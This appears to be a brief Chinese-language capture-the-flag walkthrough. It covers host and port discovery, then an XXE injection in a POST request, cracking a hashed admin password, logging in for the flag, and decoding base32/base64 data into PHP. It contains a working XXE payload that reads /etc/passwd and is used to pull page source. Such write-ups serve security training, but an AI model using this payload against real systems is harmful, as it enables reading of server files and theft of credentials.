一、 收集信息
存活主机
开放端口
存在注入
Post包里面添加
<?xml version=“1.0″ encoding=“UTF-8″?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
注出admin.php页面,然后base64解密
得到账号密码
解密e6e061838856bf47e1de730719fb2609 admin@123
账号:administhebest
登陆
得到flag
先进行base32解密,再进行base64解密。
读取这个文件看一看
解码
这。。。。看起来像php?复制下来保存到本地,命名为1.php,放到wamp中访问一波